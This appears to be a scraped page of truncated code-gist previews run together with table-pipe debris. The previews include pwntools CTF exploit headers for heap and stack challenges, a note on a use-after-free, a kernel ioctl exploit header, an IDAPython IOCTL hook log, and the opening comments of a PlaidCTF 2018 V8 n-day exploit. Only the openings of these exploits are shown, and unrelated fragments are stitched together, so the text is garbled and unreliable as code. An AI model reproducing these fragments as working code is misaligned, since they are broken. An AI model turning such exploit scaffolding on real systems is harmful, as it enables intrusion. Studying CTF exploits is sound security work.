pip install clang
pip install libclang
In IDAPython,
typedef struct _ioctl_t | |
{ | |
const char* ioctl_name; | |
uint64_t ctl_code; | |
} ioctl_t; | |
// This would likely be better used in some unordered map. This is just a temporary data structure for testing resolution. | |
// | |
// Results from NtDeviceIoControlFile hook: | |
// utweb.exe (14916) :: NtDeviceIoControlFile( 0x65c (\Device\Afd), 0x694, 0x0000000000000000, 0x0000000000000000, 0x00000000044DEE90, 0x12024 (IOCTL_AFD_SELECT), 0x0000000004A3FC18, 0x34, 0x0000000004A3FC18, 0x34 ) |
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
from pwn import * | |
import re | |
import sys | |
import string | |
import itertools | |
# UAF in IndexCursor |
#include <stdio.h> | |
#include <string.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <fcntl.h> | |
#include <sys/wait.h> | |
#include <sys/ioctl.h> | |
#include <pthread.h> | |
#define ALLOC_CTX _IO('t', 1) |
// | |
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018. | |
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d | |
// | |
// Scroll down do "BEGIN EXPLOIT" to skip the utility functions. | |
// | |
// Copyright (c) 2018 Samuel Groß | |
// | |
// |
from pwn import * | |
context.bits = 64 | |
#libc = ELF('./libc-2.23.so') | |
libc = ELF('./libc-2.24.so') | |
main = ELF('./babyheap.dbg') | |
#main = ELF('./babyheap') | |
#dbg_file = './libc-2.23.debug' | |
def gdb_load_symbols_cmd(sym_file, elf, base): |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
from pwn import * | |
code = ELF('./babystack') | |
context.arch = code.arch | |
context.log_level = 'debug' | |
gadget = lambda x: next(code.search(asm(x, os='linux', arch=code.arch))) | |
if len(sys.argv) > 2: | |
r = remote(sys.argv[1], int(sys.argv[2])) |